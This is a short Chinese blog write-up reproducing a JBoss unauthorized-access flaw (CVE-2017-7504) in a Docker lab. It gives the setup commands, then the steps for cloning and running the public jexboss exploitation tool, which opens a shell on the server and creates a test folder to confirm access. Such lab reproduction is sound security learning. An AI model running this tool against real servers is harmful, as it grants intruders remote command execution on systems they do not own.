JBoss未授权访问漏洞

前言

  环境搭建地址

环境搭建

cd /jboss/CVE-2017-7504
docker-compose up -d

  访问http://ip:8080 ,可以看到web页面
  
  点击jmx console后,这里我就和网上复现的不一样了,我出现了如下图所示,需要输入登录验证。
  
  我觉得这个问题应该是靶场的原因,然而安恒红皮书的也是用的这个靶场,但是不影响下面的漏洞利用。

漏洞验证

git clone https://github.com/joaomatosf/jexboss # 下载漏洞利用工具
cd jexboss
python3 jexboss.py -host http://ip:8080/

  将会自动检测是否可利用,当可利用时出现VULNERABLE
  
  输入yes后,进入shell模式,这时候在tmp目录下尝试创建一个test文件夹
  
  使用docker exec -it 容器id /bin/bash进入docker,发现成功创建了test文件夹
     

查看评论 -
评论